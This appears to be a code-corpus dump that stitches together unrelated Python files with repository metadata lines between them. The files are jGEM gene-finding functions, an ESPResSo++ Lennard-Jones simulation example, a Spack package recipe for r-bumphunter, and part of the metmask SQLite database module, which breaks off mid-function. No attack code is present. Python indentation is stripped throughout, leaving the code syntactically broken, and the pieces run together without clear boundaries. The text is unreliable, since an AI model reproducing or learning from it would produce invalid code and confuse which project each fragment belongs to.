# GENE FINDER ###############################################################
# def find_genes3(sj, ae, cachename=None, np=1, override=False, depth=140):
# """
# Adds _gidx column to ae
# Connection: by junctions
# Returns genes [set([_id,..]), ...]
# """
# if '_id' not in ae.columns:
# LOG.debug('setting ex _id...')
# UT.set_ids(ae)
# if '_id' not in sj.columns:
# LOG.debug('setting sj _id...')
# UT.set_ids(sj)
# if 'cat' not in ae.columns:
# UT.set_exon_category(sj,ae)
# ### FIND GENES
# if cachename and os.path.exists(cachename) and not override:
# LOG.debug('loading cached genes (connected components)...')
# genes = pickle.load(open(cachename, 'rb'))
# else:
# LOG.debug('finding genes (connected components)...')
# _sttime = time.time()
# me, se = UT.mese(ae)
# genes = mcore_allcomponents3(sj, me, np, depth=depth)
# # genes = [set([_id's]),...]
# # SE genes
# genes += [set([x]) for x in se['_id']]
# if cachename:
# UT.makedirs(os.path.dirname(cachename))
# pickle.dump(genes, open(cachename,'wb'))
# LOG.debug(' time: {0:.3f}s'.format(time.time()-_sttime))
# ### WRITE EXONS W/ GENE number
# LOG.debug('assigning gidx...')
# _sttime = time.time()
# # ae['_gidx'] = 0
# # ae.index = ae['_id']
# # for i, ids in enumerate(genes):
# # ae.ix[ids, '_gidx'] = i+1
# i2g = {}
# for i, ids in enumerate(genes):
# for x in ids:
# i2g[x] = i+1
# ae['_gidx'] = [i2g[x] for x in ae['_id']]
# ## set sj _gidx, use acceptor=>_gidx map (exon a_id, sj a_id)
# a2g = dict(UT.izipcols(ae, ['a_id','_gidx']))
# d2g = dict(UT.izipcols(ae, ['d_id','_gidx']))
# sj['_gidx'] = [a2g.get(x,d2g.get(y,-1)) for x,y in UT.izipcols(sj,['a_id','d_id'])]
# # This shouldn't happen
# nidx = ae['_gidx']==0
# if N.sum(nidx)>0:
# LOG.warning('###### WARNING!!!!!! exons with no gene assignment:{0}'.format(N.sum(nidx)))
# #ae.loc[nidx, '_gidx'] = N.arange(len(ae),len(ae)+N.sum(nidx))
# return genes
def find_genes3(sj, ae, cachename=None, np=1, override=False, depth=500, separatese=True):
"""
Adds _gidx column to ae
Connection: 1) by junctions, 2) by overlap in the same strand
Returns genes [set([_id,..]), ...]
"""
if '_id' not in ae.columns:
LOG.info('setting ex _id...')
UT.set_ids(ae)
if '_id' not in sj.columns:
LOG.info('setting sj _id...')
UT.set_ids(sj)
if 'cat' not in ae.columns:
UT.set_exon_category(sj,ae)
if 'a_id' not in ae.columns:
UT.set_ad_info(sj,ae)
### FIND GENES
if cachename and os.path.exists(cachename) and not override:
LOG.info('loading cached genes (connected components)...')
genes = pickle.load(open(cachename, 'rb'))
else:
LOG.info('finding genes (connected components)...')
_sttime = time.time()
if separatese:
me, se = UT.mese(ae)
genes = mcore_allcomponents3(sj, me, np, depth=depth)
# SE genes
genes += [set([x]) for x in se['_id']]
else:
genes = mcore_allcomponents3(sj, ae, np, depth=depth)
# version 4 graph: uses overlaps in addition to junctions to connect
# genes = [set([_id's]),...]
if cachename:
UT.makedirs(os.path.dirname(cachename))
pickle.dump(genes, open(cachename,'wb'))
LOG.info(' time: {0:.3f}s'.format(time.time()-_sttime))
### WRITE EXONS W/ GENE number
LOG.info('assigning gidx...')
_sttime = time.time()
i2g = {} # eid => _gidx
i2gn = {} # eidt => gname
g2gn = {}
i2s = dict(UT.izipcols(ae, ['_id','strand'])) # eid => strand
#i2c = dict(UT.izipcols(ae, ['_id','cat'])) # eid => category
s2n = {'+':'P','-':'N','.':'','.+':'','.-':''}
c2n = {'s':'S','i':'G','5':'G','3':'G'}
for i, ids in enumerate(genes):
gid = i+1
strand = s2n[i2s[list(ids)[0]]]
cat = 'S' if len(ids)==1 else 'G'
if strand=='N': # negative strand
gid = -gid
gname = 'J{0}{1}{2}'.format(strand,cat,abs(gid))
g2gn[gid] = gname
for x in ids:
i2g[x] = gid
i2gn[x] = gname
ae['_gidx'] = [i2g[x] for x in ae['_id']]
ae['gname'] = [i2gn[x] for x in ae['_id']]
## set sj _gidx, use acceptor=>_gidx map (exon a_id, sj a_id)
a2g = dict(UT.izipcols(ae, ['a_id','_gidx']))
d2g = dict(UT.izipcols(ae, ['d_id','_gidx']))
sj['_gidx'] = [a2g.get(x,d2g.get(y,0)) for x,y in UT.izipcols(sj,['a_id','d_id'])]
sj['gname'] = [g2gn.get(x,'') for x in sj['_gidx']]
# This shouldn't happen
nidx = ae['_gidx']==0
if N.sum(nidx)>0:
LOG.warning('###### WARNING!!!!!! exons with no gene assignment:{0}'.format(N.sum(nidx)))
#ae.loc[nidx, '_gidx'] = N.arange(len(ae),len(ae)+N.sum(nidx))
return genes
def find_genes4(sj, ae, filepre, cachename=None, np=1, override=False, depth=500, separatese=True):
"""
Adds _gidx column to ae
Connection: 1) by junctions, 2) by overlap in the same strand
Returns genes [set([_id,..]), ...]
"""
if '_id' not in ae.columns:
LOG.info('setting ex _id...')
UT.set_ids(ae)
if '_id' not in sj.columns:
LOG.info('setting sj _id...')
UT.set_ids(sj)
if 'cat' not in ae.columns:
UT.set_exon_category(sj,ae)
if 'a_id' not in ae.columns:
UT.set_ad_info(sj,ae)
### FIND GENES
if cachename and os.path.exists(cachename) and not override:
LOG.info('loading cached genes (connected components)...')
genes = pickle.load(open(cachename, 'rb'))
else:
LOG.info('finding genes (connected components)...')
_sttime = time.time()
if separatese:
me, se = UT.mese(ae)
genes = mcore_allcomponents4(sj, me, filepre, np, depth=depth)
# SE genes
genes += [set([x]) for x in se['_id']]
else:
genes = mcore_allcomponents4(sj, ae, filepre, np, depth=depth)
# version 4 graph: uses overlaps in addition to junctions to connect
# genes = [set([_id's]),...]
if cachename:
UT.makedirs(os.path.dirname(cachename))
pickle.dump(genes, open(cachename,'wb'))
LOG.info(' time: {0:.3f}s'.format(time.time()-_sttime))
### WRITE EXONS W/ GENE number
LOG.info('assigning gidx...')
_sttime = time.time()
i2g = {} # eid => _gidx
i2gn = {} # eidt => gname
g2gn = {}
i2s = dict(UT.izipcols(ae, ['_id','strand'])) # eid => strand
#i2c = dict(UT.izipcols(ae, ['_id','cat'])) # eid => category
s2n = {'+':'P','-':'N','.':'','.+':'','.-':''}
c2n = {'s':'S','i':'G','5':'G','3':'G'}
for i, ids in enumerate(genes):
gid = i+1
strand = s2n[i2s[list(ids)[0]]]
cat = 'S' if len(ids)==1 else 'G'
if strand=='N': # negative strand
gid = -gid
gname = 'J{0}{1}{2}'.format(strand,cat,abs(gid))
g2gn[gid] = gname
for x in ids:
i2g[x] = gid
i2gn[x] = gname
ae['_gidx'] = [i2g[x] for x in ae['_id']]
ae['gname'] = [i2gn[x] for x in ae['_id']]
## set sj _gidx, use acceptor=>_gidx map (exon a_id, sj a_id)
a2g = dict(UT.izipcols(ae, ['a_id','_gidx']))
d2g = dict(UT.izipcols(ae, ['d_id','_gidx']))
sj['_gidx'] = [a2g.get(x,d2g.get(y,0)) for x,y in UT.izipcols(sj,['a_id','d_id'])]
sj['gname'] = [g2gn.get(x,'') for x in sj['_gidx']]
# This shouldn't happen
nidx = ae['_gidx']==0
if N.sum(nidx)>0:
LOG.warning('###### WARNING!!!!!! exons with no gene assignment:{0}'.format(N.sum(nidx)))
#ae.loc[nidx, '_gidx'] = N.arange(len(ae),len(ae)+N.sum(nidx))
return genes
|
kensugino/jGEM
|
jgem/graph.py
|
Python
|
mit
| 24,694
|
[
"VisIt"
] |
935195e66569d28dd37c2981038889fc2d0d2ca1cd8d86b59fcd6a9cdb55e1b1
|
#!/usr/bin/env python2
# Copyright (C) 2015-2017(H)
# Max Planck Institute for Polymer Research
#
# This file is part of ESPResSo++.
#
# ESPResSo++ is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# ESPResSo++ is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#####################################################################################################
# #
# ESPResSo++ Python script for a Lennard-Jones standard system including pressure tensor analysis #
# #
#####################################################################################################
import espressopp
import logging
from math import sqrt
system, integrator = espressopp.standard_system.LennardJones(1000, (20,20,20), dt=0.00001, temperature = 1.0)
# logging.getLogger("ExtAnalyze").setLevel(logging.INFO)
print "warming up ..."
capForce = espressopp.integrator.CapForce(system, capForce=10000.0)
integrator.addExtension(capForce)
integrator.run(50000)
capForce.disconnect()
print "equilibrating ..."
integrator.dt=0.005
integrator.run(50000)
PressureTensor = espressopp.analysis.PressureTensor(system)
# interval between measurements
interval = 10
ExtAnalyzePressureTensor = espressopp.integrator.ExtAnalyze(PressureTensor, interval=interval)
integrator.addExtension(ExtAnalyzePressureTensor)
print "starting integration ... measuring pressure tensor every ", interval, " steps"
PressureTensor.reset()
integrator.run(10000)
average_PressureTensor = PressureTensor.getAverageValue()
print "average Pressure Tensor = ", average_PressureTensor[:6]
print " std deviation = ", average_PressureTensor[6:]
print "number of measurements = ", PressureTensor.getNumberOfMeasurements()
|
govarguz/espressopp
|
examples/analyze_during_integration/analyze_during_integration.py
|
Python
|
gpl-3.0
| 2,404
|
[
"ESPResSo"
] |
93119c0160b23f1b023ee8b79edf299d62f8adb8e52e095ce5a1de52bd58e530
|
# Copyright 2013-2021 Lawrence Livermore National Security, LLC and other
# Spack Project Developers. See the top-level COPYRIGHT file for details.
#
# SPDX-License-Identifier: (Apache-2.0 OR MIT)
from spack import *
class RBumphunter(RPackage):
"""Bump Hunter
Tools for finding bumps in genomic data"""
homepage = "https://bioconductor.org/packages/bumphunter"
git = "https://git.bioconductor.org/packages/bumphunter.git"
version('1.32.0', commit='b7d39c2a6385ca217dceefc918b3ccd5c31bbaa0')
version('1.26.0', commit='606bee8708a0911ced3efb197970b4c9fa52f2fa')
version('1.24.5', commit='29b874033a38e86103b58ef2d4a55f285758147b')
version('1.22.0', commit='fb71b193f4ef7fa12d100441e6eb498765f7afde')
version('1.20.0', commit='c9d8e7ab0c19299988e5d7fa74970312e9a1eac0')
version('1.16.0', commit='1c3ab4d1fd2d75b1586ccef12665960b3602080a')
depends_on('r@2.10:', type=('build', 'run'))
depends_on('r@3.4:', when='@1.20.0:', type=('build', 'run'))
depends_on('r@3.5:', when='@1.24.5:', type=('build', 'run'))
depends_on('r-s4vectors@0.9.25:', type=('build', 'run'))
depends_on('r-iranges@2.3.23:', type=('build', 'run'))
depends_on('r-genomeinfodb', type=('build', 'run'))
depends_on('r-genomicranges', type=('build', 'run'))
depends_on('r-foreach', type=('build', 'run'))
depends_on('r-iterators', type=('build', 'run'))
depends_on('r-locfit', type=('build', 'run'))
depends_on('r-matrixstats', type=('build', 'run'))
depends_on('r-limma', type=('build', 'run'))
depends_on('r-dorng', type=('build', 'run'))
depends_on('r-biocgenerics', type=('build', 'run'))
depends_on('r-genomicfeatures', type=('build', 'run'))
depends_on('r-annotationdbi', type=('build', 'run'))
|
LLNL/spack
|
var/spack/repos/builtin/packages/r-bumphunter/package.py
|
Python
|
lgpl-2.1
| 1,783
|
[
"Bioconductor"
] |
ff08f4770f57a405a15c6d835e7c5f5b56cd4cffda9f2b5973671547b81466fb
|
"""
A module to manage all transcations with the metmask database.
How to use this module
======================
1. Get a connection to your database (just a file location or possible
':memory:' if you do intend to keep the information
``mm = dbi.db('/home/user/metmask.db')``
2. Insert with `setMask` (see the `mask` module)
3. Query information with the `simpleQuery` interface
4. Close the database either explicitly with `close` or let python
take care of it with just `del mm`
Database tables
===============
- version, the current version number to make sure we do not try
to query an incompatible database
- confidence, holds the confidence codes
- sources, holds the sources codes
- assidx, just an column index (could just as well have been
part of the associations table
- assocaition, holds information about all associations, their
confidence and where they came from
- idtables, a table specifiying which identifier tables the
database currently posses
- _id, basically also just an identifier table but this holds
the master mask identifier
- the rest are tables that holds the identifiers and are named
exactly like the identifier it self
Copyright (C) Henning Redestig
2009
See COPYING.txt for licensing details.
"""
from __future__ import print_function
from __future__ import absolute_import
from builtins import input
from builtins import str
from builtins import map
from builtins import range
from builtins import object
import os
import pdb
import re
import sqlite3
import sys
import metmask
from . import query
from .mask import mask
def determine_path():
"""Borrowed from wxglade.py"""
try:
root = __file__
if os.path.islink(root):
root = os.path.realpath(root)
return os.path.dirname(os.path.abspath(root))
except:
print("I'm sorry, but something is wrong.")
print("There is no __file__ variable. Please contact the author.")
sys.exit()
class recursionError(Exception):
"""this error indicates that when setting a new mask, the program got
stuck in a recursion, attempting to merge too many mask. This
should not happen unless the database is corrupt or the user tries
to set a mask that holds too many common identifiers.
"""
def __init__(self, value):
self.value = value
def __str__(self):
return repr(self.value)
class dbError(Exception):
"""generic database error that wasn't due to syntax problems
"""
def __init__(self, value):
self.value = value
def __str__(self):
return (repr(self.value))
class db(object):
""" The object that should do all transcation to the database. The use
of a single db object for each database ensures that no db-locks
should occur and that connections are not opened and closed too often.
"""
def __init__(self, db, ask=False, debug=True, minoverlap=2):
""" Initialize a `db` object.
Parameters
----------
-`db`, string indicating where the database is or should be
stored. Use ':memory:' to keep everything in the working memory.
- `ask`, logical indicating if the database should expect
feedback from the user or not when deciding how to merge
masks.
- `debug`, logical for outputting more information.
"""
self.db = db
self.ask = ask
self.debug = debug
self.ifconflict = 'm'
""" `string` indicating the default action when merging (merge, prune) """
self.confidence = {}
""" `dictionary` holding the current known confidence codes and the
indices in the database """
self.idpatterns = {'kegg': '[cCdD]\d{5}$',
'cas': '\d{1,7}-\d{2}-\d{1}$',
'_id': '\d+$',
'synonym': '.+',
'mpimp': '.+',
'riken': '.+',
'cycdb': '.+',
'rlib': '[a-z|A-Z]{0,1}\d{4}',
'kappav': '[kK][pP][cC]\d{5}',
'knapsack': '[cC]\d{8}',
'tsuruoka': '[tT]-\d+$',
'cqid': 'cq_\d{5}$',
'cid': '\d+$',
'chebi': '(CHEBI:){0,1}\d+$',
'default': 'synonym',
'inchi': 'InChI=.+',
'metlin': '\d+$',
'sid': '\d+$',
'hmdb': 'hmdb\d+$',
}
""" dictionary which holds regular expression that
all identifiers for the respective table must match """
self.METMASK_CONF = 0
""" reserved confidence index for internal associations """
self.FORBIDDENTABLENAMES = ['ALL', 'bioconductor', 'all', 'mask', 'graph', 'unknown']
""" reserved strings """
self.METMASK = 'metmask'
self.MAIL = 'metmask-geek@lists.sourceforge.net'
self.METMASKID = 0
""" reserved source string """
self.MIN_OVERLAP = int(minoverlap)
"""`int` the mininum number of tables this mask must match with other
masks in order to merged directly """
self.depth = 0
""" the current level of recursion, used to break a transcation before
recurses too deep """
self.rw = False
self.c = None
""" indicates if we have rw access or not """
if self.db != ':memory:':
if not os.access(self.db, os.F_OK):
try:
open(self.db, 'a').close()
except:
raise dbError('can not create db @ ' + self.db)
if not os.access(self.db, os.R_OK):
raise dbError('can not access db @ ' + self.db)
self.rw = os.access(self.db, os.W_OK)
else:
self.rw = True
self.connection = sqlite3.connect(self.db)
""" `sqlite3.connection` the current connection to the database """
self.connection.text_factory = str
""" see sqlite3 documentation """
self.c = self.connection.cursor()
""" `sqlite3.cursor` the object that can write the db """
if self.debug:
print("#COMMENT Welcome to metmask v" + metmask.__version__)
if not self.getIdTables():
self.setup()
if self.debug:
print("started new database")
else:
# check that we have a legal version (same middle version
# number), other version numbers indicate database
# structural changes
self.c.execute("SELECT number FROM version")
version = self.c.fetchone()[0]
if metmask.__version__.split('.')[1] != version.split('.')[1]:
raise dbError('existing database was created with version ' +
str(version) +
', the database format has changed, re-create '
'the database or use a matching metmask version')
self.updateConfidence()
self.updateIdpatterns()
def __del__(self):
""" commit and close and connection """
try:
self.close()
except sqlite3.ProgrammingError as inst:
if str(inst) != 'Cannot operate on a closed database.':
raise inst
def updateIdpatterns(self):
""" update the patterns dictionary """
self.c.execute("SELECT * FROM idpatterns")
tmp = self.c.fetchall()
for t in tmp:
self.idpatterns[str(t[0])] = t[1]
if self.rw:
self.c.execute("DELETE FROM idpatterns")
for k in list(self.idpatterns.keys()):
self.c.execute("INSERT INTO idpatterns VALUES (?,?)", (k, self.idpatterns[k]))
def updateConfidence(self):
""" update the confidence dictionary with indices and the codes """
self.c.execute("SELECT * FROM confidence")
for co in self.c.fetchall():
self.confidence[str(co[1])] = int(co[0])
def close(self):
""" commit and close the connection """
if self.c:
self.updateForBioC()
self.connection.commit()
self.connection.close()
if self.debug:
print("#COMMENT closed metmask database")
def setup(self):
""" Create the necessary tables for and insert basic information that
must be in all metmask databases.
"""
try:
# misc tables
self.c.execute("CREATE TABLE version (number TEXT)")
self.c.execute("INSERT INTO version VALUES (:num)", {'num': metmask.__version__})
self.c.execute("CREATE TABLE metadata (name TEXT, value TEXT)")
self.c.execute("CREATE TABLE map_counts (map_name TEXT, count INTEGER)")
self.c.execute("CREATE TABLE idpatterns (name TEXT, pattern TEXT)")
self.c.execute("CREATE TABLE assidx (assid INTEGER PRIMARY KEY)")
# confidence
st = "CREATE TABLE confidence ( confid INTEGER PRIMARY KEY, description TEXT UNIQUE )"
self.c.execute(st)
self.c.execute("INSERT INTO confidence VALUES (?, ?)", (self.METMASK_CONF, 'metmask-internal'))
self.c.execute("INSERT INTO confidence VALUES (?, ?)", (metmask.NEVERMERGE_CONF, 'nevermerge'))
self.c.execute("INSERT INTO confidence VALUES (?, ?)", (metmask.WEAK_CONF, 'weak'))
# sources
self.c.execute(
"CREATE TABLE sources ( sourceid INTEGER PRIMARY KEY, name TEXT, master TEXT REFERENCES idtables (name))")
self.c.execute("INSERT INTO sources VALUES (?, ?, ?)", (self.METMASKID, self.METMASK, "_id"))
# standards id tables
self.c.execute(
"CREATE TABLE _id (_id INTEGER PRIMARY KEY, mmid INTEGER, conf INTEGER, src INTEGER, qc INTEGER DEFAULT 0, ass INTEGER DEFAULT 0, UNIQUE (_id, qc))") # mmid is duplicate of _id
self.c.execute(
"CREATE TABLE preferred (_id INTEGER UNIQUE REFERENCES _id (_id), preferred TEXT UNIQUE, conf INTEGER, src INTEGER, qc INTEGER, ass INTEGER DEFAULT 0)")
# idtables
self.c.execute(
"CREATE TABLE idtables ( tableid INTEGER PRIMARY KEY, name TEXT NOT NULL UNIQUE, weak INTEGER DEFAULT 0 )")
self.c.execute("INSERT INTO idtables VALUES (0, \"_id\", 0)")
self.c.execute("INSERT INTO idtables VALUES (1, \"preferred\", 0)")
except sqlite3.OperationalError:
raise dbError("Something went wrong, is the db already initialized?")
def updateForBioC(self):
""" update map_counts and etc so bioconductor is happy
"""
if not self.rw:
return 0
self.c.execute("DELETE FROM map_counts")
tabs = self.getIdTables()
total = 0
for t in tabs:
self.c.execute("SELECT count(*) FROM " + t)
num = self.c.fetchall()[0][0]
total = total + num
self.c.execute("INSERT INTO map_counts VALUES (?,?)", (str(t).upper(), int(num)))
self.c.execute("INSERT INTO map_counts VALUES (?,?)", ("TOTAL", int(total)))
self.c.execute("DELETE FROM metadata")
self.c.execute("INSERT INTO metadata VALUES (?, ?)", (str("DBSCHEMAVERSION"), str("2.0")))
self.c.execute("INSERT INTO metadata VALUES (?, ?)", (str("DBSCHEMA"), str("METMASK_DB")))
self.c.execute("INSERT INTO metadata VALUES (?, ?)", ("METMASK_VERSION", str(metmask.__version__)))
for k in list(self.confidence.keys()):
self.c.execute("INSERT INTO metadata VALUES (?, ?)", ("CONFIDENCE_" + str(k).upper(), self.confidence[k]))
self.c.execute("SELECT * FROM sources")
tmp = self.c.fetchall()
for t in tmp:
self.c.execute("INSERT INTO metadata VALUES (?, ?)", ("SOURCE_" + t[1].upper(), t[0]))
strong = self.getIdTables(weak=False)
for t in tabs:
weak = "WEAK"
if t in strong:
weak = "STRONG"
self.c.execute("INSERT INTO metadata VALUES (?, ?)", (t.upper(), weak))
def createIdTable(self, name, weak=0):
""" Create a new identifier table. No return value.
Parameters:
- `name`: string specifying the name of the identifier.
"""
name = name.rstrip()
if re.match(".*\..*", name):
raise dbError("dot in table name " + name + ". Specify other name")
if name in self.FORBIDDENTABLENAMES:
raise dbError("name of table must not be one of" + str(self.FORBIDDENTABLENAMES))
stTable = "CREATE TABLE " + name + " ( _id INTEGER REFERENCES _id (_id), " + \
name + \
" TEXT, conf INTEGER, src INTEGER, qc INTEGER, ass INTEGER DEFAULT 0, UNIQUE (_id, ass, " + name + "), UNIQUE (" + name + ", qc))"
try:
self.c.execute(stTable)
self.c.execute("CREATE INDEX " + name + "_idx" + " ON " + name + " ( " + name + " )")
self.c.execute("INSERT INTO idtables VALUES (?, ?, ?)", (None, name, weak))
except sqlite3.OperationalError as inst:
if not re.match(".*already exists$", str(inst)):
raise inst
def setTableWeak(self, name):
""" grade an id-table as weak (only relevant for bioconductor)
Parameters:
-`name` : the name of the table
"""
if not name in self.getIdTables():
raise dbError("trying to weaken a non-existent table: " + str(name))
self.c.execute("UPDATE idtables SET weak = 1 WHERE name = :name", {'name': name})
def addAss(self):
""" add an association to the database and get the new association
index back
"""
st = "INSERT INTO assidx VALUES (:ass)"
self.c.execute(st, {'ass': None})
return (self.c.lastrowid)
def addMm(self):
""" add a new mask and get it the index back
"""
self.c.execute("INSERT INTO _id VALUES (?, ?, ?, ?, ?, ?)", (None, 0, self.METMASK_CONF, self.METMASKID, 0, 0))
_id = self.c.lastrowid
self.c.execute("UPDATE _id SET mmid = :_id WHERE _id = :_id", {'_id': _id})
return (_id)
def dropPreferred(self, _id):
""" delete any preferred labels that might be associated with this
mask
Parameters:
- `_id`: the _id
"""
ma = mask({})
ma.append('_id', _id)
existing = self.getMask(ma)
if existing:
if existing[0].hasTable('preferred'):
prefs = existing[0].getIdentifers('preferred')
for p in prefs:
self.c.execute('DELETE FROM preferred WHERE _id = :_id', {'_id': _id})
def addConf(self, name):
""" add or fetch a entry from/to the confidence table, get the
created/existing confidence index back
"""
if name in self.confidence:
return (self.confidence[name])
try:
self.c.execute("INSERT INTO confidence VALUES (?, ?)", (None, name))
except sqlite3.IntegrityError as inst:
raise inst
self.updateConfidence()
return (self.addConf(name))
def addSource(self, name, add=True, master='unknown'):
""" add or fetch a entry from/to the sources table, get the
created/existing source index back
"""
if name in self.getIdTables():
raise dbError("source name must not equal a table name")
self.c.execute("SELECT sourceid FROM sources WHERE name = :name", {'name': name})
sourceid = self.c.fetchall()
if sourceid or not add:
return (sourceid[0][0])
else:
self.c.execute("INSERT INTO sources VALUES (?, ?, ?)", (None, name, master))
return (self.c.lastrowid)
def sourceid2master(self, seq):
""" convert a list of source id's to source names
Parameters:
- `seq`, a list of source names
"""
res = []
st = "SELECT master FROM sources WHERE sourceid = ? "
for s in seq:
self.c.execute(st, (s,))
tmp = self.c.fetchall()
for t in tmp:
res = res + [t[0]]
return (res)
def sourceid2source(self, seq):
""" convert a list of source id's to source names
Parameters:
- `seq`, a list of source names
"""
res = []
st = "SELECT name FROM sources WHERE sourceid = ? "
for s in seq:
self.c.execute(st, (s,))
tmp = self.c.fetchall()
for t in tmp:
res = res + [t[0]]
return (res)
def getWeakTables(self):
alltab = self.getIdTables(True)
strong = self.getIdTables(False)
return ([x for x in alltab if x not in strong])
def getIdTables(self, weak=True):
""" get a list with the names of the tables that hold identifiers
Parameters:
-`weak`: fetch weak tables as well
"""
try:
if not weak:
self.c.execute("SELECT name FROM idtables WHERE weak != 1")
else:
self.c.execute("SELECT name FROM idtables")
tables = [x[0] for x in self.c.fetchall()]
return (tables)
except sqlite3.OperationalError as inst:
if re.match('no such table', str(inst)):
return (None)
else:
raise inst
def getMmid(self, un, weak=False, wildcards=False):
""" get the corresponding mmids pointing to anything in this
mask. Return a vector of mmids.
Parameters:
- `un` : a mask
"""
tables = un.getTables()
res = set()
for tab in tables:
st = "SELECT _id FROM " + tab + " WHERE " + tab + "= :identifier"
if wildcards:
st = "SELECT _id FROM " + tab + " WHERE " + tab + " LIKE :identifier"
if not weak:
st = st + " AND conf !=" + str(metmask.WEAK_CONF)
identifiers = un.getIdentifiers(tab, weak=weak)
for ide in identifiers:
try:
self.c.execute(st, {'identifier': ide})
tmp = self.c.fetchall()
if tmp:
for t in tmp:
res.add(t[0])
except sqlite3.OperationalError as inst:
if re.match("no such table", str(inst)):
pass
else:
raise
# loose the set feature
res = [x for x in res]
return (res)
def getMask(self, un, weak=False, wildcards=False):
""" get all masks that point to anything in the given mask.
Parameters:
- `un`, an instance of `mask.mask`
"""
mmids = self.getMmid(un, weak=weak, wildcards=wildcards)
result = []
tabs = self.getIdTables()
for mm in mmids:
newmask = mask({})
for ta in tabs:
st = "SELECT * FROM " + ta + " WHERE _id = " + str(mm)
if not weak:
st = st + " AND conf != " + str(metmask.WEAK_CONF)
try:
self.c.execute(st)
tmp = self.c.fetchall()
except sqlite3.OperationalError as inst:
if re.match('no such table', inst):
pass
else:
raise inst
if tmp:
for t in tmp:
ide = t[1]
if ta == '_id':
ide = int(ide)
newmask.append(ta, ide, t[2], t[3], t[5])
result.append(newmask)
return (result)
def insertToMask(self, table, _id, value, conf, src, retry=True, nozero=False, ass=0):
""" Insert something to an id-table
Parameters:
-`table`: the table to insert to
-`_id` : the _id (aka mmid)
-`value` : the value to associate _id with (eg cas number)
-`conf` : the confidence code
-`src` : the source code
"""
if table not in self.getIdTables(weak=True):
raise dbError("trying to insert to unknown table: " + str(table))
if table in self.getWeakTables():
conf = metmask.WEAK_CONF
if table == '_id' or table == 'preferred':
conf = self.METMASK_CONF
if conf == metmask.WEAK_CONF or nozero:
self.c.execute("SELECT count(*) FROM " + table)
qc = self.c.fetchall()[0][0] + 1
else:
qc = 0
st = "INSERT INTO " + table + " VALUES (:id, :value, :conf, :src, :qc, :ass)"
try:
self.c.execute(st, {'id': _id, 'value': value, 'conf': conf, 'src': src, 'qc': qc, 'ass': ass})
except sqlite3.IntegrityError as inst:
if re.match("columns.+are not unique", str(inst)):
if retry:
# the ugly hack to allow strong identifier to come from
# several sources
stx = "SELECT DISTINCT _id FROM " + table + " WHERE " + table + " = \"" + value + "\" AND conf !=" + str(
metmask.WEAK_CONF)
self.c.execute(stx)
checkOk = [x[0] == _id for x in self.c.fetchall()]
if all(checkOk):
self.insertToMask(table, _id, value, conf, src, False, True, ass=ass)
else:
pass
def setMask(self, un, resolve=True):
""" Try to input all information in this mask to the database. The db
is first queried for any conflicting masks and the new
information is then either merged to an existing mask or
conflicting information is pruned. See manual.txt for further
clarification of how this is decided.
Parameters:
- `un`: a instance of `mask.mask`
- `resolve`: should conflicts try to be resolved or just over-run with 'merge'
"""
# some globals for this function
mmidsToMerge = []
def panicCheck():
self.depth = self.depth + 1
if self.depth > 100:
return (True)
else:
return (False)
# if you add something, conditions are changed and we might get
# stuck in a loop where synonym is removed due to conflicet then
# re-added here and... unless we only do it once... HACK!
# preferred must also be a strong synonym
if self.depth == 0:
if un.hasTable('preferred'):
mpref = un.getIdentifiers('preferred')[0]
there = False
if un.hasTable('synonym'):
if mpref in un.getIdentifiers('synonym', weak=False):
there = True
if not there:
un.append('synonym', mpref, un.getConfidence('preferred', mpref)[0], \
un.getSource('preferred', mpref)[0])
# ignore pointless masks, (only maps to itself)
# un.show()
# print "-------------------"
# if un.nid() < 2 :
if un.isEmpty():
self.depth = 0 # no risk to get stuck agaion
if self.debug:
print("#COMMENT Ignoring pointless mask")
return (0)
# see if we already know something about its content, otherwise
# we get []
_id = self.getMmid(un)
conflict = False
if _id:
conflict = True
if conflict:
# There are mmids that already point to identifiers behind
# this mask, such identifiers are not allowed. solution is
# to either:
#
# - merge the new mask with the existing mask.
#
# - create a new mask but prune away the offending identifiers
# (what we do if there is an error in the input)
#
# get the first conflicting masks
tmpmask = mask({})
tmpmask.append('_id', _id[0])
cnf = self.getMask(tmpmask, weak=True).pop() # get the full mask
if panicCheck():
if self.debug:
pdb.set_trace()
else:
raise recursionError('bogging down..')
# try to figure out what to do with the rest:
if resolve:
possibility = un.resolve(cnf, mm=self)
else:
possibility = 'merge'
if not possibility:
if self.debug:
print("#COMMENT keeping existing mask..", end=' ')
un.subtract(cnf) # subtract non-weak ids
self.setMask(un, resolve)
return (0)
else:
self.ifconflict = possibility[0]
if self.debug:
print("#COMMENT " + str(possibility))
# >>>>Get user decision if asked for
if self.ask:
print("***** conflicting mask *******")
cnf.show(mm=self)
print("***** mask to insert *********")
un.show(mm=self)
print("***** overlap ****************")
intersection = un.intersect(cnf)
intersection.show(mm=self)
print("default:" + possibility)
choice = input("[m]erge/[p]rune and merge : ")
if len(choice) > 0:
self.ifconflict = choice
if self.ifconflict[-1] == '!':
self.ask = False
self.ifconflict = self.ifconflict[0]
# done asking>>>>>>>>>>>>>>>>>>>>>>>
# merge the new information into the existing one
if self.ifconflict in ['', 'm']:
if self.debug:
print("#COMMENT merging to mask..", end=' ')
un.merge(cnf) # got an _id.. , merge weak as well
self.dropMask(cnf) # drop weak as well
if self.ifconflict == 'p':
# now prune away what is left
un.subtract(cnf) # lost the _id.. .. but no overlap
self.setMask(un, resolve) # ..anyway, re-submit
return (1)
elif not conflict:
if un.hasTable('_id'):
# make sure we remove all mmids but the first one, the
# other were already removed from the db
allMmids = un.getIdentifiers('_id')
mmidsToMerge = un.getIdentifiers('_id')
while len(allMmids) > 1:
un.delIdentifiers('_id', allMmids.pop())
# get a new mmmid
if not un.hasTable('_id'):
# no _id matches the given identifiers, we have found a new compound
# add to the 'preferred' table
_id = self.addMm()
# adding a clause here to set conf to nevermerge if any
# nevermerge, we could probably use the weakenIdentifier again
if un.anyNeverMerge():
un.append('_id', _id, 0, metmask.NEVERMERGE_CONF)
else:
un.append('_id', _id, 0, self.METMASK_CONF)
self.fixPreferred(un)
self.depth = 0
# get the (old or new) _id without its dimension
_id = un.getIdentifiers('_id')[0]
# replace
if self.debug:
print("inserting mask:" + str(_id))
# first drop any preferred we already have in the database, we
# set it back again
if un.hasTable('preferred'):
self.fixPreferred(un)
